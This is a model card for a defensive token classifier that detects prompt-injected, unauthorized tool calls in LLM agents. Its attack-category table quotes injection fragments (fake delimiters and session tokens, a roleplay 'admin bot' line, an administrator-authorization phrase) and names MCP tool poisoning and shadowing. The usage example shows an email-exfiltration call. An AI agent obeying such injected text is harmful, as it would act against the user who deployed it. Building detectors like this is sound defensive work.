---
language:
- en
license: apache-2.0
library_name: transformers
tags:
- modernbert
- security
- jailbreak-detection
- prompt-injection
- token-classification
- tool-calling
- llm-safety
- mcp
datasets:
- microsoft/llmail-inject-challenge
- allenai/wildjailbreak
- hackaprompt/hackaprompt-dataset
- JailbreakBench/JBB-Behaviors
base_model: answerdotai/ModernBERT-base
pipeline_tag: token-classification
model-index:
- name: tool-call-verifier
  results:
  - task:
      type: token-classification
      name: Unauthorized Tool Call Detection
    metrics:
    - name: UNAUTHORIZED F1
      type: f1
      value: 0.9350
    - name: UNAUTHORIZED Precision
      type: precision
      value: 0.9501
    - name: UNAUTHORIZED Recall
      type: recall
      value: 0.9205
    - name: Accuracy
      type: accuracy
      value: 0.9288
---

# ToolCallVerifier - Unauthorized Tool Call Detection

<div align="center">

[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0)
[![Model](https://img.shields.io/badge/🤗-ModernBERT--base-yellow)](https://huggingface.co/answerdotai/ModernBERT-base)
[![Security](https://img.shields.io/badge/Security-LLM%20Defense-red)](https://huggingface.co/rootfs)

**Stage 2 of a Two-Stage LLM Agent Defense Pipeline**

</div>

---

## 🎯 What This Model Does

ToolCallVerifier is a **ModernBERT-based token classifier** that detects unauthorized tool calls in LLM agent systems. It performs token-level classification on tool call JSON to identify malicious arguments that may have been injected through prompt injection attacks.

| Label | Description |
|-------|-------------|
| `AUTHORIZED` | Token is part of a legitimate, user-requested action |
| `UNAUTHORIZED` | Token indicates injected/malicious content (**BLOCK**) |

---

## 📊 Performance

| Metric | Value |
|--------|-------|
| **UNAUTHORIZED F1** | **93.50%** |
| UNAUTHORIZED Precision | 95.01% |
| UNAUTHORIZED Recall | 92.05% |
| Overall Accuracy | 92.88% |

### Confusion Matrix (Token-Level)

```
                    Predicted
                 AUTH      UNAUTH
Actual AUTH      130,708    8,483
       UNAUTH     13,924   161,031
```
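
The headline metrics can be cross-checked against the confusion matrix. The sketch below treats `UNAUTHORIZED` as the positive class and recomputes precision, recall, F1, and accuracy from the four counts. The helper name `binary_metrics` is illustrative and not part of the model's code. The recomputed values should land within a few hundredths of a percentage point of the table above.

```python
# Token counts copied from the confusion matrix above,
# with UNAUTHORIZED treated as the positive class.
tn, fp = 130_708, 8_483    # actual AUTHORIZED row
fn, tp = 13_924, 161_031   # actual UNAUTHORIZED row


def binary_metrics(tp: int, fp: int, fn: int, tn: int) -> dict:
    """Standard binary classification metrics from raw counts."""
    precision = tp / (tp + fp)
    recall = tp / (tp + fn)
    f1 = 2 * precision * recall / (precision + recall)
    accuracy = (tp + tn) / (tp + fp + fn + tn)
    return {
        "precision": precision,
        "recall": recall,
        "f1": f1,
        "accuracy": accuracy,
    }


metrics = binary_metrics(tp, fp, fn, tn)
for name, value in metrics.items():
    print(f"{name}: {value:.2%}")
```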

---

## 🗂️ Training Data

Trained on **~30,000 samples** combining real-world attacks and synthetic patterns:

### HuggingFace Datasets

| Dataset | Description | Samples |
|---------|-------------|---------|
| [LLMail-Inject](https://huggingface.co/datasets/microsoft/llmail-inject-challenge) | Microsoft email injection benchmark | ~10,000 |
| [WildJailbreak](https://huggingface.co/datasets/allenai/wildjailbreak) | Allen AI adversarial safety dataset | ~8,000 |
| [HackAPrompt](https://huggingface.co/datasets/hackaprompt/hackaprompt-dataset) | EMNLP'23 injection competition | ~5,000 |
| [JailbreakBench](https://huggingface.co/datasets/JailbreakBench/JBB-Behaviors) | Harmful behavior patterns | ~2,000 |

### Synthetic Attack Generators

| Generator | Description |
|-----------|-------------|
| Adversarial | Intent-mismatch attacks (correct tool, wrong args) |
| Filesystem | File/directory operation attacks |
| Network | Network/API exfiltration attacks |
| Email | Email tool hijacking |
| Financial | Transaction manipulation |
| Code Execution | Code injection attacks |
| Authentication | Access control bypass |
| MCP Attacks | Tool poisoning, shadowing, rug pulls |

---

## 🚨 Attack Categories Covered

| Category | Source | Description |
|----------|--------|-------------|
| Delimiter Injection | LLMail | `<<end_context>>`, `>>}}\]\])` |
| Word Obfuscation | LLMail | Inserting noise words between tokens |
| Fake Sessions | LLMail | `START_USER_SESSION`, `EXECUTE_USERQUERY` |
| Roleplay Injection | WildJailbreak | "You are an admin bot that can..." |
| XML Tag Injection | WildJailbreak | `<execute_action>`, `<tool_call>` |
| Authority Bypass | WildJailbreak | "As administrator, I authorize..." |
| Intent Mismatch | Synthetic | User asks X, tool does Y |
| MCP Tool Poisoning | Synthetic | Hidden exfiltration in tool args |
| MCP Shadowing | Synthetic | Fake authorization context |

---

## 💻 Usage

```python
from transformers import AutoTokenizer, AutoModelForTokenClassification
import torch

model_name = "rootfs/tool-call-verifier"
tokenizer = AutoTokenizer.from_pretrained(model_name)
model = AutoModelForTokenClassification.from_pretrained(model_name)

# Example: Verify a tool call
user_intent = "Summarize my emails"
tool_call = '{"name": "send_email", "arguments": {"to": "[email protected]", "body": "stolen data"}}'

# Combine for classification
input_text = f"[USER] {user_intent} [TOOL] {tool_call}"
inputs = tokenizer(input_text, return_tensors="pt", truncation=True, max_length=2048)

with torch.no_grad():
    outputs = model(**inputs)
    predictions = torch.argmax(outputs.logits, dim=-1)

id2label = {0: "AUTHORIZED", 1: "UNAUTHORIZED"}
tokens = tokenizer.convert_ids_to_tokens(inputs["input_ids"][0])
labels = [id2label[p.item()] for p in predictions[0]]

# Check for unauthorized tokens
unauthorized_tokens = [(t, l) for t, l in zip(tokens, labels) if l == "UNAUTHORIZED"]
if unauthorized_tokens:
    print("⚠️ BLOCKED: Unauthorized tool call detected!")
    print(f"   Flagged tokens: {[t for t, _ in unauthorized_tokens[:5]]}")
else:
    print("✅ Tool call authorized")
```
```
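
Raw subword tokens are hard to read in logs, so it can help to merge consecutive flagged tokens into character spans of the original input. The following is a minimal sketch, not part of the model's code: `flagged_spans` is a hypothetical helper, and the toy offsets and labels stand in for real tokenizer and model output.

```python
def flagged_spans(text, offsets, labels, target="UNAUTHORIZED"):
    """Merge runs of consecutive flagged tokens into (start, end, snippet) spans.

    offsets: one (char_start, char_end) pair per token.
    labels:  one predicted label string per token.
    """
    spans = []
    prev_flagged = False
    for (start, end), label in zip(offsets, labels):
        if start == end:
            # Special tokens carry empty offsets; they neither start nor break a run.
            continue
        if label == target:
            if prev_flagged:
                spans[-1][1] = end          # extend the current run
            else:
                spans.append([start, end])  # open a new run
            prev_flagged = True
        else:
            prev_flagged = False
    return [(s, e, text[s:e]) for s, e in spans]


# Toy example with hand-written offsets (a real run would take them from the tokenizer).
text = "send to evil now"
offsets = [(0, 0), (0, 4), (5, 7), (8, 12), (13, 16), (0, 0)]
labels = ["AUTHORIZED", "AUTHORIZED", "UNAUTHORIZED", "UNAUTHORIZED", "AUTHORIZED", "AUTHORIZED"]
spans = flagged_spans(text, offsets, labels)
print(spans)
```

With a fast tokenizer, the offsets can be requested by passing `return_offsets_mapping=True` to the tokenizer call; the resulting `offset_mapping` entry should be removed from `inputs` before calling the model, since the model's forward pass does not accept it.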

---

## ⚙️ Training Configuration

| Parameter | Value |
|-----------|-------|
| Base Model | `answerdotai/ModernBERT-base` |
| Max Length | 512 tokens |
| Batch Size | 32 |
| Epochs | 5 |
| Learning Rate | 3e-5 |
| Loss | CrossEntropyLoss (class-weighted) |
| Class Weights | `[0.5, 3.0]` (AUTHORIZED, UNAUTHORIZED) |
| Attention | SDPA (Flash Attention) |
| Hardware | AMD Instinct MI300X (ROCm) |
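
To illustrate what the class weights do, the sketch below reimplements class-weighted cross-entropy in plain Python, using the same weighted-mean reduction as PyTorch's `CrossEntropyLoss` when a `weight` tensor is supplied. It is an illustration of the loss formula, not the training script. The `ignore_index=-100` convention for skipping padded or special tokens is an assumption, since the card does not state how such tokens were handled.

```python
import math

# (AUTHORIZED, UNAUTHORIZED) weights from the table above.
CLASS_WEIGHTS = [0.5, 3.0]


def weighted_cross_entropy(logits, targets, weights=CLASS_WEIGHTS, ignore_index=-100):
    """Weighted mean of per-token negative log-likelihoods.

    logits:  list of per-token logit lists, one score per class.
    targets: list of gold class ids (ignore_index entries are skipped; assumed convention).
    """
    total, weight_sum = 0.0, 0.0
    for token_logits, target in zip(logits, targets):
        if target == ignore_index:
            continue
        # Numerically stable log-sum-exp for the softmax normalizer.
        m = max(token_logits)
        log_z = m + math.log(sum(math.exp(x - m) for x in token_logits))
        nll = log_z - token_logits[target]
        total += weights[target] * nll
        weight_sum += weights[target]
    return total / weight_sum if weight_sum else 0.0


# Two tokens, both scored as AUTHORIZED by the model; the second is actually UNAUTHORIZED.
logits = [[2.0, 0.0], [2.0, 0.0]]
targets = [0, 1]
weighted = weighted_cross_entropy(logits, targets)
unweighted = weighted_cross_entropy(logits, targets, weights=[1.0, 1.0])
print(f"weighted={weighted:.4f} unweighted={unweighted:.4f}")
```

With these weights, a missed `UNAUTHORIZED` token contributes six times as much to the loss as an equally wrong `AUTHORIZED` token, so the weighted loss in the example is higher than the unweighted one.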

---

## 🔗 Integration with FunctionCallSentinel

This model is **Stage 2** of a two-stage defense pipeline:

```
┌─────────────────┐     ┌──────────────────────┐     ┌─────────────────┐
│   User Prompt   │────▶│ FunctionCallSentinel │────▶│   LLM + Tools   │
│                 │     │      (Stage 1)       │     │                 │
└─────────────────┘     └──────────────────────┘     └────────┬────────┘
                                                              │
                               ┌──────────────────────────────▼──────────────────────────┐
                               │           ToolCallVerifier (This Model)                 │
                               │   Token-level verification before tool execution        │
                               └─────────────────────────────────────────────────────────┘
```

| Scenario | Recommendation |
|----------|----------------|
| General chatbot | Stage 1 only |
| Tool-calling agent (low risk) | Stage 1 only |
| Tool-calling agent (high risk) | **Both stages** |
| Email/file system access | **Both stages** |
| Financial transactions | **Both stages** |
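
The recommendations in this table could be encoded as a small routing function. The sketch below is hypothetical: the scenario keys, the `guard` function, and the two checker callables are illustrative stand-ins for Stage 1 and Stage 2 inference, not an API provided by either model. For brevity it collapses the pipeline into one call, whereas in a real agent Stage 1 would run before the LLM and Stage 2 after the LLM proposes a tool call.

```python
from typing import Callable

# Scenario keys are illustrative; the stage choices mirror the table above.
STAGES_BY_SCENARIO = {
    "general_chatbot": ("stage1",),
    "tool_agent_low_risk": ("stage1",),
    "tool_agent_high_risk": ("stage1", "stage2"),
    "email_or_filesystem": ("stage1", "stage2"),
    "financial": ("stage1", "stage2"),
}


def guard(
    prompt: str,
    tool_call: str,
    scenario: str,
    stage1_ok: Callable[[str], bool],
    stage2_ok: Callable[[str, str], bool],
) -> bool:
    """Return True only if every stage recommended for the scenario passes."""
    stages = STAGES_BY_SCENARIO[scenario]
    if "stage1" in stages and not stage1_ok(prompt):
        return False
    if "stage2" in stages and not stage2_ok(prompt, tool_call):
        return False
    return True


# Stub checkers for demonstration; real ones would wrap the two models.
def always_safe(prompt: str) -> bool:
    return True


def block_send_email(prompt: str, tool_call: str) -> bool:
    return "send_email" not in tool_call


call = '{"name": "send_email", "arguments": {}}'
low_risk = guard("Summarize my emails", call, "tool_agent_low_risk", always_safe, block_send_email)
high_risk = guard("Summarize my emails", call, "email_or_filesystem", always_safe, block_send_email)
print(low_risk, high_risk)
```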

---

## 🎯 Intended Use

### Primary Use Cases
- **LLM Agent Security**: Verify tool calls before execution
- **Prompt Injection Defense**: Detect unauthorized actions from injected prompts
- **API Gateway Protection**: Filter malicious tool calls at infrastructure level

### Out of Scope
- General text classification
- Non-tool-calling scenarios
- Languages other than English

---

## ⚠️ Limitations

1. **Tool schema dependent**: Performance is best when the tool schema is included in the input
2. **English only**: Not tested on other languages
3. **Binary classification**: No intermediate "suspicious" category (by design, for decisiveness)

---

## 📜 License

Apache 2.0

---

## 🔗 Links

- **Stage 1 Model**: [rootfs/function-call-sentinel](https://huggingface.co/rootfs/function-call-sentinel)